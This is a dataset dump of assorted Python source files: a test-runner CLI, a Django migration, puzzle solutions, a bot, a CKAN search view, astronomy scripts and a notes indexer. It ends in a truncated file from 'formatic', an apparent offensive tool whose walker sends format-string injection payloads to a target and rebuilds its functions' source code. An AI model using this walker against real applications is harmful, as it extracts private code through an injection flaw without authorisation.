max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
jobson_systemtests/cli.py | adamkewley/jobson_systemtests | 0 | 12796151 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import sys
import jobson_systemtests
def main(argv=None):
if argv is None:
argv = sys.argv
parser = argparse.ArgumentParser(description='Run jobson system tests')
parser.add_argument(
'specs_dir',
type=str,
help='Path to directory containing jobson specs (and tests)')
parser.add_argument(
'host',
type=str,
help='The host running the server (e.g. localhost)')
parser.add_argument(
'port',
type=int,
help='The port the Jobson API is listening on (e.g. 8080)')
parser.add_argument(
'login',
type=str,
help='The login to use to access the API')
parser.add_argument(
'password',
type=str,
help='The password to use the access the API')
args = parser.parse_args(argv[1:])
jobson_systemtests.run(
specs_dir=args.specs_dir,
host=args.host,
port=args.port,
login=args.login,
password=args.password)
return 0
if __name__ == "__main__":
sys.exit(main())
| 2.328125 | 2 |
conventions/migrations/0008_auto_20210831_1707.py | MTES-MCT/appel | 0 | 12796152 | <filename>conventions/migrations/0008_auto_20210831_1707.py
# Generated by Django 3.2.5 on 2021-08-31 15:07
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("conventions", "0007_auto_20210831_0908"),
]
operations = [
migrations.AddField(
model_name="convention",
name="fond_propre",
field=models.FloatField(null=True),
),
migrations.AlterField(
model_name="convention",
name="numero",
field=models.CharField(max_length=255, null=True),
),
]
| 1.382813 | 1 |
src/findRepeatedDnaSequences.py | JL1829/LeetCode | 0 | 12796153 | <gh_stars>0
"""
所有的DNA都是由一系列缩写为`A`, `C`, `G`, `T`的核苷酸组成, 例如:
`ACGAATTCCG`。在研究DNA时,识别DNA中重复的序列有时候会对研究很有帮助。
编写一个函数, 找出所有的目标子串,目标子串长度为`L`, 且在DNA字符串`s` 中出现次数超过一次
**test case**
>>> s = "AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT"
>>> findRepeatedDnaSequence(sequence=s, length=10)
['AAAAACCCCC', 'CCCCCAAAAA']
>>> s = 'AAAAAAAAAAAAA'
>>> findRepeatedDnaSequence(sequence=s, length=10)
['AAAAAAAAAA']
# Solution
***
## Approach 1
简单固定长度滑动窗口, 长度为L, 左边逐个迭代。
并且用两个set(), 一个用于存储已经见过的字符串,一个用于输出
"""
def findRepeatedDnaSequence(sequence, length):
n = len(sequence)
seen = set()
output = set()
# iterate over all sequences of length
for start in range(n - length + 1):
tmp = sequence[start:start + length]
if tmp in seen:
output.add(tmp[:])
seen.add(tmp)
return list(output)
if __name__ == '__main__':
s1 = 'AAAAACCCCCAAAAACCCCCCAAAAAGGGTTT'
s2 = 'AAAAAAAAAAAAA'
print(f"For input DNA string: {s1}"
f"\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s1, length=10)}")
print(f"For input DNA string: {s2}"
f"\n The Repeated subSequence is: {findRepeatedDnaSequence(sequence=s2, length=10)}")
| 3.78125 | 4 |
onyx/main.py | mudkipdev/onyx | 0 | 12796154 | from discord.ext import commands
import discord
import yaml
import os
class Bot(commands.Bot):
async def get_prefix(self, bot, message):
"""Fetches the current prefix in the guild from the database."""
return commands.when_mentioned_or("onyx ")
def __init__(self):
"""Initialize the bot and load all extensions."""
with open("C:/onyx/config.yml", encoding = "UTF-8") as f:
self.config = yaml.safe_load(f)
super().__init__(
command_prefix = self.get_prefix,
intents = discord.Intents.default()
)
client = Bot()
client.load_extension("jishaku") # Load the debugging cog.
@client.check
async def check(ctx):
return True
token = os.getenv("TOKEN")
client.run(token)
| 2.515625 | 3 |
src/search/views.py | l27-0-0-1/sigma | 0 | 12796155 | import urllib.parse
from django.shortcuts import render
#from ckan_model import stub as ckan
from ckan_model import production as ckan
#from ..ckan_model import production as ckan
import django.http
def index(request: django.http.HttpRequest):
payload = {}
google = ckan.Search()
payload['top_tags'] = google.top_tags()
return render(request, 'index.html', context=payload)
def search(request: django.http.HttpRequest):
# it's a search engine!
google = ckan.Search()
payload = {}
payload['tags'] = google.tags_list()
payload['unis'] = google.university_list()
page = int(request.GET.get('page', 1))
page_size = 10
start_pos = (page - 1) * page_size
if request.GET:
response = google.students(request.GET.getlist('selected_tags'),
request.GET.getlist('selected_unis'),
start=start_pos,
rows=page_size
)
else:
response = google.students()
total = response['total']
pages_count = total//10+bool(total%10)
actual_page = start_pos//page_size + 1
parsed_url = list(urllib.parse.urlparse(request.get_full_path()))
options = dict(urllib.parse.parse_qsl(parsed_url[4]))
def change_url(n):
options['page'] = n
parsed_url[4] = urllib.parse.urlencode(options)
return urllib.parse.urlunparse(parsed_url)
pages = [{'number': n,
'url': change_url(n),
'active': n == actual_page} for n in range(1, pages_count)]
payload["pagination"] = { "pages": pages,
"prev": actual_page > 1,
"next": actual_page < pages_count,
}
payload['results'] = response['results']
return render(request, 'search.html', payload) | 2.140625 | 2 |
plot_redshift_distr.py | anjmittu/SwiftGRB_PEanalysis-master | 5 | 12796156 | import numpy as np
from scipy.integrate import quad
import matplotlib.pyplot as plt
def Redshift(n0, n1, n2, z1=3.6, z=np.linspace(0,10,num=1001)):
Rlow = np.power((1.0 + z), n1)
Rhigh = np.power((1.0 + z), n2)
rbrk = np.power((1.0 + z1), n1 - n2)
R = Rlow * (z <= z1) + rbrk * Rhigh * (z > z1)
R *= n0 / R[0]
return z, R
z, R = Redshift(0.84, 2.07, -0.7)
plt.plot(z,R,'-k')
plt.xlabel(r'$z$')
plt.ylabel(r'$\mathcal{R}(z)$')
plt.grid()
#plt.gca().set_yscale('log')
plt.show()
#### This computes E(z) and int_0^z dz'/E(z') and saves to file
def Efunc(z):
Omega_m = 0.274
Omega_lambda = 0.726
E = np.sqrt(Omega_m * np.power((1 + z), 3) + Omega_lambda)
return E
def Efuncinv(z):
return 1.0 / Efunc(z)
z = np.linspace(0,10,num=1001)
dz = z[1] - z[0]
E = Efunc(z)
Eics = np.zeros(E.shape)
for i in range(len(Eics)):
Eics[i] = (quad(Efuncinv, 0, z[i])[0])**2.0
#Eics = np.square(np.cumsum(1.0 / E) * dz)
#Eics[1:] = Eics[:-1]
#Eics[0] = 0
Eall = Eics / E;
z = z.reshape(z.shape[0],1)
E = E.reshape(E.shape[0],1)
Eics = Eics.reshape(Eics.shape[0],1)
Eall = Eall.reshape(Eall.shape[0],1)
d = np.concatenate((z,E,Eics,Eall),axis=1)
np.savetxt('support_data/splines_Ez.txt',d,fmt='%0.9lf')
z2, R = Redshift(0.84, 2.07, -0.7, z=z)
Rp = R / (1+z) * Eall
plt.plot(z,Rp,'-k')
plt.plot(z,R/(1+z),'--b')
plt.plot(z,Eall,'-.r')
#plt.plot(z,np.cumsum(Eall),'-g')
plt.xlabel(r'$z$')
plt.grid()
plt.show()
| 2.609375 | 3 |
Leetcode/1000-2000/1872. Stone Game VIII/1872.py | Next-Gen-UI/Code-Dynamics | 0 | 12796157 | <filename>Leetcode/1000-2000/1872. Stone Game VIII/1872.py
class Solution:
def stoneGameVIII(self, stones: List[int]) -> int:
n = len(stones)
prefix = list(accumulate(stones))
# dp[i] := max score diff the current player can get when the game starts
# at i, i.e., stones[0..i] are merged whose value is prefix[i]
dp = [-math.inf] * n
# must take all when there're only two stones left
dp[n - 2] = prefix[-1]
for i in reversed(range(n - 2)):
dp[i] = max(dp[i + 1], prefix[i + 1] - dp[i + 1])
return dp[0]
| 3.1875 | 3 |
src/jupyter_contrib_nbextensions/hello.py | satishv21/jupyter_contrib_nbextensions | 0 | 12796158 | <filename>src/jupyter_contrib_nbextensions/hello.py
def main(str):
print("nonce")
| 1.117188 | 1 |
game_summary/__init__.py | ch4zm/blaseball-game-summary | 0 | 12796159 | <gh_stars>0
_program = "game-summary"
__version__ = "0.7.1"
| 1.007813 | 1 |
examples/reply_keyboard/button.py | dotX12/waio | 24 | 12796160 | from waio.keyboard.reply import QuickReplyContentText, QuickReply, KeyboardButton, QuickReplyContentImage
from callback import callback_reply_keyboard
def generate_keyboard_place():
kb_content = QuickReplyContentText(
header="Куда вы сегодня хотите сходить?",
text="Выберите из предложенного списка",
caption=""
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(name="place", id="1"), content=kb_content)
kb.add(KeyboardButton(title='Кинотеатр')).add(KeyboardButton(title='Ресторан'))
return kb
def generate_keyboard_cinema_time():
kb_content = QuickReplyContentText(
header="Кинотеатр",
text="Выберите удобное для Вас время",
caption=""
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(name="cinema_time", id="2"), content=kb_content)
kb.add(KeyboardButton(title='18:00')).add(KeyboardButton(title='20:00'))
return kb
def generate_keyboard_restaurant_time():
kb_content = QuickReplyContentText(
header="Ресторан",
text="Выберите удобное для Вас время",
caption="",
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(name="restaurant_time", id="2"), content=kb_content)
kb.add(KeyboardButton(title='18:30')).add(KeyboardButton(title='21:00'))
return kb
def generate_keyboard_image(): # Можно отправить клавиатуру с изображением, вместо заголовка. В примере не использовалось
kb_content = QuickReplyContentImage(
url="https://www.buildquickbots.com/whatsapp/media/sample/jpg/sample01.jpg",
text="this is the body",
caption="this is the footer"
)
kb = QuickReply(callback_data=callback_reply_keyboard.new(type="start", id="1"), content=kb_content)
kb.add(KeyboardButton(title='Сменить ресторан')).add(KeyboardButton(title='Новый ресторан'))
return kb
| 2.453125 | 2 |
KAT7/reduction/horizon_mask_reduction.py | ska-sa/katsdpscripts | 0 | 12796161 | <gh_stars>0
#!/usr/bin/python
# Plot horizon mask
import optparse
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.mlab as mlab
import scape
from katpoint import rad2deg
def remove_rfi(d,width=3,sigma=5,axis=1):
for i in range(len(d.scans)):
d.scans[i].data = scape.stats.remove_spikes(d.scans[i].data,axis=axis,spike_width=width,outlier_sigma=sigma)
return d
def main():
# Parse command-line options and arguments
parser = optparse.OptionParser(usage='%prog [options] <data file> [<data file> ...]',
description='Display a horizon mask from a set of data files.')
parser.add_option('-a', '--baseline', dest='baseline', type="string", metavar='BASELINE', default='A1A1',
help="Baseline to load (e.g. 'A1A1' for antenna 1), default is first single-dish baseline in file")
parser.add_option('-o', '--output', dest='output', type="string", metavar='OUTPUTFILE', default=None,
help="Write out intermediate h5 file")
parser.add_option('-s', '--split', dest='split', action="store_true", metavar='SPLIT', default=False,
help="Whether to split each horizon plot in half")
parser.add_option('-z', '--azshift', dest='azshift', type='float', metavar='AZIMUTH_SHIFT', default=45.0,
help="Degrees to rotate azimuth window by.")
parser.add_option('--temp-limit', dest='temp_limit', type='float', default=40.0,
help="The Tempreture Limit to make the cut-off for the mask. This is calculated "
"as the T_sys at zenith plus the atmospheric noise contrabution at 10 degrees"
"elevation as per R.T. 199 .")
parser.add_option("-n", "--nd-models",
help="Name of optional directory containing noise diode model files")
(opts, args) = parser.parse_args()
# Check arguments
if len(args) < 1:
raise RuntimeError('Please specify the data file to reduce')
# Load data set
gridtemp = []
for filename in args:
print 'Loading baseline', opts.baseline, 'from data file', filename
d = scape.DataSet(filename, baseline=opts.baseline,nd_models=opts.nd_models)
if len(d.freqs) > 1:
# Only keep main scans (discard slew and cal scans) a
d = d.select(freqkeep=range(200, 800))
d = remove_rfi(d,width=7,sigma=5)
d = d.convert_power_to_temperature(min_duration=3, jump_significance=4.0)
d = d.select(flagkeep='~nd_on')
d = d.select(labelkeep='scan', copy=False)
# Average all frequency channels into one band
d.average()
# Extract azimuth and elevation angle from (azel) target associated with scan, in degrees
azimuth, elevation, temp = [], [], []
for s in d.scans:
azimuth.extend(rad2deg(s.pointing['az']))
elevation.extend(rad2deg(s.pointing['el']))
temp.extend(tuple(np.sqrt(s.pol('HH')[:,0]*s.pol('VV')[:,0])))
assert len(azimuth) == len(elevation) == len(temp), "sizes don't match"
data = (azimuth, elevation, temp)
np.array(azimuth)<-89
print "Gridding the data"
print "data shape = ",np.shape(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist())
print np.shape(data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist())
print np.shape(data[2]+np.array(temp)[np.array(azimuth)<-89].tolist())
gridtemp.append(mlab.griddata(data[0]+(np.array(azimuth)[np.array(azimuth)<-89]+360.0).tolist(), data[1]+np.array(elevation)[np.array(azimuth)<-89].tolist(), data[2]+np.array(temp)[np.array(azimuth)<-89].tolist(), np.arange(-90,271,1), np.arange(4,16,0.1)))
# The +361 is to ensure that the point are well spaced,
#this offset is not a problem as it is just for sorting out a boundery condition
print "Completed Gridding the data"
print "Making the mask"
mask = gridtemp[0] >= opts.temp_limit
for grid in gridtemp:
mask = mask * (grid >= opts.temp_limit)
maskr = np.zeros((len(np.arange(-90,271,1)),2))
for i,az in enumerate(np.arange(-90,271,1)):
print 'at az %f'%(az,)
maskr[i] = az,np.max(elevation)
for j,el in enumerate(np.arange(4,16,0.1)):
if ~mask.data[j,i] and ~mask.mask[j,i] :
maskr[i] = az,el
break
np.savetxt('horizon_mask_%s.dat'%(opts.baseline),maskr[1:,:])
#plt.figure()
#plt.subplot(1, 1, 1)
#plt.plot(maskr[1:,0],maskr[1:,1])
#az_title,el_title,big_title = ('Azimuth (deg)', 'Elevation (deg)', 'Mask for %s' % (opts.baseline,))
#plt.xlabel(az_title)
#plt.ylabel(el_title)
#plt.ylim(0,15)
#plt.title(big_title)
#plt.show()
if __name__ == "__main__":
main()
| 2.53125 | 3 |
vim/vimfiles/python3/search_notes.py | sharat87/lawn | 5 | 12796162 | #!/usr/bin/env python
# Python script for fast text file searching using keyword index on disk.
#
# Author: <NAME> <<EMAIL>>
# Last Change: November 1, 2015
# URL: http://peterodding.com/code/vim/notes/
# License: MIT
#
# This Python script can be used by the notes.vim plug-in to perform fast
# keyword searches in the user's notes. It has two advantages over just
# using Vim's internal :vimgrep command to search all of the user's notes:
#
# - Very large notes don't slow searching down so much;
# - Hundreds of notes can be searched in less than a second.
#
# The keyword index is a Python dictionary that's persisted using the pickle
# module. The structure of the dictionary may seem very naive but it's quite
# fast. Also the pickle protocol makes sure repeating strings are stored only
# once, so it's not as bad as it may appear at first sight :-).
#
# For more information about the Vim plug-in see http://peterodding.com/code/vim/notes/.
"""
Usage: search_notes.py [OPTIONS] KEYWORD...
Search one or more directories of plain text files using a full text index,
updated automatically during each invocation of the program.
Valid options include:
-i, --ignore-case ignore case of keyword(s)
-l, --list=SUBSTR list keywords matching substring
-d, --database=FILE set path to keywords index file
-n, --notes=DIR set directory with user notes (can be repeated)
-e, --encoding=NAME set character encoding of notes
-v, --verbose make more noise
-h, --help show this message and exit
For more information see http://peterodding.com/code/vim/notes/
"""
# Standard library modules.
import codecs
import fnmatch
import getopt
import logging
import os
import re
import sys
import time
import pickle
from typing import List, Set
try:
import Levenshtein
except ImportError:
Levenshtein = None
# The version of the index format that's supported by this revision of the
# `search_notes.py' script; if an existing index file is found with an
# unsupported version, the script knows that it should rebuild the index.
INDEX_VERSION = 3
# Filename matching patterns of files to ignore during scans.
INCLUDE_PATTERNS = {'*.md', '*.txt'}
NOTES_DIRECTORIES = [os.path.expanduser('~/Dropbox/notes')]
INDEX_FILE_PATH = os.path.expanduser('~/notes-index.pickle')
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
def load_index(index_location):
try:
load_timer = Timer()
logger.debug("Loading index from %s ..", index_location)
with open(index_location, 'rb') as handle:
index = pickle.load(handle)
logger.debug("Format version of index loaded from disk: %i", index['version'])
assert index['version'] == INDEX_VERSION, "Incompatible index format detected!"
logger.debug("Loaded %i notes from index in %s", len(index['files']), load_timer)
except Exception:
logger.warning("Failed to load index from file!", exc_info=True)
return {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}
else:
return index
class TextIndex:
def __init__(self, index_location: str, notes_directories: List[str]):
self.index_location = index_location
self.notes_directories = notes_directories
self.index = load_index(self.index_location)
def search(self, query: str) -> List[str]:
"""Return names of files containing all of the given keywords."""
print('Searching index')
index = load_index(INDEX_FILE_PATH)
needles = query.split()
matches = None
normalized_db_keywords = [(k, k.lower()) for k in index['keywords']]
for word in needles:
submatches = set()
for original_db_kw, normalized_db_kw in normalized_db_keywords:
if word in normalized_db_kw:
submatches.update(index['keywords'][original_db_kw])
if matches is None:
matches = submatches
else:
matches &= submatches
return sorted(matches) if matches else []
def update_index(self):
"""Update the keyword index by scanning the notes directory."""
user_directories = self.notes_directories
index = self.index
# First we find the filenames and last modified times of the notes on disk.
notes_on_disk = {}
last_count = 0
for directory in user_directories:
for root, dirs, files in os.walk(directory):
for filename in files:
if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
abspath = os.path.join(root, filename)
notes_on_disk[abspath] = os.path.getmtime(abspath)
logger.info("Found %i notes in %s ..", len(notes_on_disk) - last_count, directory)
last_count = len(notes_on_disk)
logger.info("Found a total of %i notes ..", len(notes_on_disk))
# Check for updated and/or deleted notes since the last run?
if index:
for filename in set(index['files'].keys()):
if filename not in notes_on_disk:
# Forget a deleted note.
self.delete_note_from_index(index, filename)
else:
# Check whether previously seen note has changed?
last_modified_on_disk = notes_on_disk[filename]
last_modified_in_db = index['files'][filename]
if last_modified_on_disk > last_modified_in_db:
self.delete_note_from_index(index, filename)
self.add_note_to_index(index, filename, last_modified_on_disk)
# Already checked this note, we can forget about it.
del notes_on_disk[filename]
# Add new notes to index.
for filename, last_modified in notes_on_disk.items():
self.add_note_to_index(index, filename, last_modified)
# TODO: Only save if necessary.
self.save_index(INDEX_FILE_PATH, index)
def add_note_to_index(self, index, filename, last_modified):
"""Add a note to the index (assumes the note is not already indexed)."""
logger.info("Adding file to index: %s", filename)
index['files'][filename] = last_modified
with open(filename, encoding='utf-8') as handle:
raw = handle.read()
for kw in tokenize(raw):
if kw not in index['keywords']:
index['keywords'][kw] = [filename]
else:
index['keywords'][kw].append(filename)
def delete_note_from_index(self, index, filename):
"""Delete a note from given index."""
logger.info("Deleting file from index: %s", filename)
del index['files'][filename]
for kw in index['keywords']:
index['keywords'][kw] = [x for x in index['keywords'][kw] if x != filename]
def tokenize(self, text: str) -> Set[str]:
"""Tokenize a string into a list of normalized, unique keywords."""
return {w.strip() for w in re.findall(r'\w{3,}', text, re.UNICODE) if not w.isspace()}
def save_index(self, database_file: str, index):
"""Save the keyword index to disk."""
with open(database_file, 'wb') as handle:
pickle.dump(index, handle)
class NotesIndex:
def __init__(self, argv=None):
"""Entry point to the notes search."""
global_timer = Timer()
keywords = self.parse_args(argv or sys.argv[1:])
self.load_index()
self.update_index()
if self.dirty:
self.save_index()
if self.keyword_filter is not None:
self.list_keywords(self.keyword_filter)
logger.debug("Finished listing keywords in %s", global_timer)
else:
matches = self.search_index(keywords)
if matches:
print('\n'.join(sorted(matches)))
logger.debug("Finished searching index in %s", global_timer)
def parse_args(self, argv):
"""Parse the command line arguments."""
try:
opts, keywords = getopt.getopt(argv, 'il:d:n:e:vh', [
'ignore-case', 'list=', 'database=', 'notes=', 'encoding=',
'verbose', 'help',
])
except getopt.GetoptError as error:
print(str(error))
self.usage()
sys.exit(2)
# Define the command line option defaults.
self.database_file = '~/.vim/misc/notes/index.pickle'
self.user_directories = ['~/.vim/misc/notes/user/']
self.character_encoding = 'UTF-8'
self.case_sensitive = True
self.keyword_filter = None
# Map command line options to variables.
for opt, arg in opts:
if opt in ('-i', '--ignore-case'):
self.case_sensitive = False
logger.debug("Disabling case sensitivity")
elif opt in ('-l', '--list'):
self.keyword_filter = arg.strip().lower()
elif opt in ('-d', '--database'):
self.database_file = arg
elif opt in ('-n', '--notes'):
self.user_directories.append(arg)
elif opt in ('-e', '--encoding'):
self.character_encoding = arg
elif opt in ('-v', '--verbose'):
logger.setLevel(logging.DEBUG)
elif opt in ('-h', '--help'):
self.usage()
sys.exit(0)
else:
assert False, "Unhandled option"
logger.debug("Index file: %s", self.database_file)
logger.debug("Notes directories: %r", self.user_directories)
logger.debug("Character encoding: %s", self.character_encoding)
if self.keyword_filter is not None:
self.keyword_filter = self.decode(self.keyword_filter)
# Canonicalize pathnames, check validity.
self.database_file = self.munge_path(self.database_file)
self.user_directories = [self.munge_path(d) for d in self.user_directories if os.path.isdir(d)]
# Return tokenized keyword arguments.
return [self.normalize(k) for k in self.tokenize(' '.join(keywords))]
def load_index(self):
"""Load the keyword index or start with an empty one."""
try:
load_timer = Timer()
logger.debug("Loading index from %s ..", self.database_file)
with open(self.database_file, 'rb') as handle:
self.index = pickle.load(handle)
logger.debug("Format version of index loaded from disk: %i", self.index['version'])
assert self.index['version'] == INDEX_VERSION, "Incompatible index format detected!"
self.first_use = False
self.dirty = False
logger.debug("Loaded %i notes from index in %s", len(self.index['files']), load_timer)
except Exception:
logger.warn("Failed to load index from file!", exc_info=True)
self.first_use = True
self.dirty = True
self.index = {'keywords': {}, 'files': {}, 'version': INDEX_VERSION}
def save_index(self):
"""Save the keyword index to disk."""
save_timer = Timer()
with open(self.database_file, 'wb') as handle:
pickle.dump(self.index, handle)
logger.debug("Saved index to disk in %s", save_timer)
def update_index(self):
"""Update the keyword index by scanning the notes directory."""
update_timer = Timer()
# First we find the filenames and last modified times of the notes on disk.
notes_on_disk = {}
last_count = 0
for directory in self.user_directories:
print('Scanning', directory)
for root, dirs, files in os.walk(directory):
for filename in files:
if any(fnmatch.fnmatch(filename, pattern) for pattern in INCLUDE_PATTERNS):
abspath = os.path.join(root, filename)
notes_on_disk[abspath] = os.path.getmtime(abspath)
logger.info("Found %i notes in %s ..", len(notes_on_disk) - last_count, directory)
last_count = len(notes_on_disk)
logger.info("Found a total of %i notes ..", len(notes_on_disk))
# Check for updated and/or deleted notes since the last run?
if not self.first_use:
for filename in self.index['files'].keys():
if filename not in notes_on_disk:
# Forget a deleted note.
self.delete_note(filename)
else:
# Check whether previously seen note has changed?
last_modified_on_disk = notes_on_disk[filename]
last_modified_in_db = self.index['files'][filename]
if last_modified_on_disk > last_modified_in_db:
self.delete_note(filename)
self.add_note(filename, last_modified_on_disk)
# Already checked this note, we can forget about it.
del notes_on_disk[filename]
# Add new notes to index.
for filename, last_modified in notes_on_disk.items():
self.add_note(filename, last_modified)
logger.info("Updated index in %s", update_timer)
def add_note(self, filename, last_modified):
"""Add a note to the index (assumes the note is not already indexed)."""
logger.info("Adding file to index: %s", filename)
self.index['files'][filename] = last_modified
with open(filename, encoding='utf-8') as handle:
for kw in self.tokenize(handle.read()):
if kw not in self.index['keywords']:
self.index['keywords'][kw] = [filename]
else:
self.index['keywords'][kw].append(filename)
self.dirty = True
def delete_note(self, filename):
"""Remove a note from the index."""
logger.info("Removing file from index: %s", filename)
del self.index['files'][filename]
for kw in self.index['keywords']:
self.index['keywords'][kw] = [x for x in self.index['keywords'][kw] if x != filename]
self.dirty = True
def search_index(self, keywords):
"""Return names of files containing all of the given keywords."""
matches = None
normalized_db_keywords = [(k, self.normalize(k)) for k in self.index['keywords']]
for usr_kw in keywords:
submatches = set()
for original_db_kw, normalized_db_kw in normalized_db_keywords:
# Yes I'm using a nested for loop over all keywords in the index. If
# I really have to I'll probably come up with something more
# efficient, but really it doesn't seem to be needed -- I have over
# 850 notes (about 8 MB) and 25000 keywords and it's plenty fast.
if usr_kw in normalized_db_kw:
submatches.update(self.index['keywords'][original_db_kw])
if matches is None:
matches = submatches
else:
matches &= submatches
return list(matches) if matches else []
def list_keywords(self, substring, limit=25):
"""Print all (matching) keywords to standard output."""
print('listing keywords')
decorated = []
substring = self.normalize(substring)
for kw, filenames in self.index['keywords'].items():
normalized_kw = self.normalize(kw)
if substring in normalized_kw:
if Levenshtein is not None:
decorated.append((Levenshtein.distance(normalized_kw, substring), -len(filenames), kw))
else:
decorated.append((-len(filenames), kw))
decorated.sort()
selection = [d[-1] for d in decorated[:limit]]
print(selection)
print(self.encode(u'\n'.join(selection)))
def tokenize(self, text):
"""Tokenize a string into a list of normalized, unique keywords."""
words = set()
text = self.decode(text)
for word in re.findall(r'\w+', text, re.UNICODE):
word = word.strip()
if word != '' and not word.isspace() and len(word) >= 2:
words.add(word)
return words
def normalize(self, keyword):
"""Normalize the case of a keyword if configured to do so."""
return keyword if self.case_sensitive else keyword.lower()
def encode(self, text):
"""Encode a string in the user's preferred character encoding."""
if isinstance(text, str):
text = codecs.encode(text, self.character_encoding, 'ignore')
return text
def decode(self, text):
"""Decode a string in the user's preferred character encoding."""
if isinstance(text, bytes):
text = codecs.decode(text, self.character_encoding, 'ignore')
return text
def munge_path(self, path):
"""Canonicalize user-defined path, making it absolute."""
return os.path.abspath(os.path.expanduser(path))
def usage(self):
print(__doc__.strip())
class Timer:
"""Easy to use timer to keep track of long during operations."""
def __init__(self):
self.start_time = time.time()
def __str__(self):
return "%.2f seconds" % self.elapsed_time
@property
def elapsed_time(self):
return time.time() - self.start_time
if __name__ == '__main__':
NotesIndex()
| 3.15625 | 3 |
formatic/walkers/function_injection_walker.py | welchbj/formatic | 2 | 12796163 | """Implementation of the FunctionInjectionWalker class."""
from inspect import (
signature as inspect_signature)
from types import (
CodeType,
FunctionType)
from typing import (
Iterator,
Optional)
from .abstract_injection_walker import (
AbstractInjectionWalker)
from .code_object_injection_walker import (
CodeObjectInjectionWalker)
from .doc_string_injection_walker import (
DocStringInjectionWalker)
from .failed_injection_walker import (
FailedInjectionWalker)
from .name_injection_walker import (
NameInjectionWalker)
class FunctionInjectionWalker(AbstractInjectionWalker):
"""Injection walker for a function.
This module will attempt to recover the source code from a function, via
access to its ``__code__`` attribute.
"""
INJECTION_RE = None
RESPONSE_RE = r'<function .+ at 0x[0-9a-fA-F]+>'
def __extra_init__(
self
) -> None:
self._code_walker: Optional[CodeObjectInjectionWalker] = None
self._name_walker: NameInjectionWalker = \
self.empty_instance(NameInjectionWalker)
self._docstring_walker: DocStringInjectionWalker = \
self.empty_instance(DocStringInjectionWalker)
self._src_code: Optional[str] = None
self._signature: Optional[str] = None
@property
def code_walker(
self
) -> Optional[CodeObjectInjectionWalker]:
"""The code object that this walker recovered from the target.
This attribute will only be populated after a call to :func:`walk`. If
the call to ``walk()`` cannot recover the object, then this attribute
will remain as ``None``.
"""
return self._code_walker
@property
def name_walker(
self
) -> NameInjectionWalker:
"""Walker used to recover this function's __name__."""
return self._name_walker
@property
def docstring_walker(
self
) -> DocStringInjectionWalker:
"""Walker used to recover this function's __doc__ string."""
return self._docstring_walker
@property
def src_code(
self
) -> Optional[str]:
"""The source code that this walker recovered from the target."""
return self._src_code
@property
def signature(
self
) -> Optional[str]:
"""The decompiled function's signature, if one was retrieved."""
return self._signature
def walk(
self
) -> Iterator[AbstractInjectionWalker]:
yield from self._walk_name()
if not self._name_walker.is_default:
if self._name_walker.value in self._engine.function_blacklist:
return
self._engine.function_blacklist.add(self._name_walker.value)
yield from self._walk_docstring()
code_obj_injection = f'{self._injection_str}.__code__'
raw_result = self._harness.send_injection(code_obj_injection)
if raw_result is None:
yield FailedInjectionWalker.msg(
'Unable to recover injection response from string '
f'{raw_result}')
return
walker = self.next_walker(code_obj_injection, raw_result)
if walker is None:
yield FailedInjectionWalker.msg(
'No matching walker found for injection response '
f'{raw_result}')
return
elif not isinstance(walker, CodeObjectInjectionWalker):
yield FailedInjectionWalker.msg(
f'Got {type(walker)} when injecting function __code__ '
'attribute; something is terribly wrong...')
return
for sub_walker in walker.walk():
yield sub_walker
if walker.code_obj is None or walker.src_code is None:
yield FailedInjectionWalker.msg(
'Unable to successfully recover code object from string '
f'{walker.injection_str}')
return
src_lines = ([] if walker.src_code is None else
walker.src_code.splitlines())
indented_src_lines = [f' {line}' for line in src_lines]
self._signature = self.__class__.code_obj_to_signature(
walker.code_obj)
self._src_code = f'{self._signature}\n'
if self._docstring_walker.value:
self._src_code += f' """{self._docstring_walker.value}"""\n'
self._src_code += '\n'.join(indented_src_lines)
yield self
def _walk_name(
self
) -> Iterator[AbstractInjectionWalker]:
"""Recover the function's __name__ attribute."""
name_injection = f'{self._injection_str}.__qualname__!r'
result = self._harness.send_injection(name_injection)
if result is None:
yield FailedInjectionWalker.msg(
'Unable to read __name__ of function via injection '
f'{name_injection}')
return
walker = self.next_walker(name_injection, result)
if not isinstance(walker, NameInjectionWalker):
yield FailedInjectionWalker.msg(
f'Expected a name walker when sending {name_injection} '
f'but got {walker.__class__.__qualname__} instead')
return
yield from walker.walk()
self._name_walker = walker
def _walk_docstring(
self
) -> Iterator[AbstractInjectionWalker]:
"""Recover the function's __doc__ attribute."""
doc_string_injection = f'{self._injection_str}.__doc__!r'
result = self._harness.send_injection(doc_string_injection)
if result is None:
yield FailedInjectionWalker.msg(
'Unable to read __doc__ of function via injection '
f'{doc_string_injection}')
return
walker = self.next_walker(doc_string_injection, result)
if not isinstance(walker, DocStringInjectionWalker):
yield FailedInjectionWalker.msg(
f'Expected a doc walker when sending {doc_string_injection} '
f'but got {walker.__class__.__qualname__} instead')
return
yield from walker.walk()
self._docstring_walker = walker
@staticmethod
def code_obj_to_signature(
code_obj: CodeType
) -> str:
"""Get a function signature from a code object.
See:
https://stackoverflow.com/a/56761306/5094008
"""
try:
func = FunctionType(code_obj, {})
arg_sequence = inspect_signature(func)
return f'def {code_obj.co_name}{arg_sequence}:'
except TypeError:
# build our own signature
return f"""\
# exact argument names could not be reversed for below signature
def {code_obj.co_name}(*args, **kwargs):"""
def __str__(
self
) -> str:
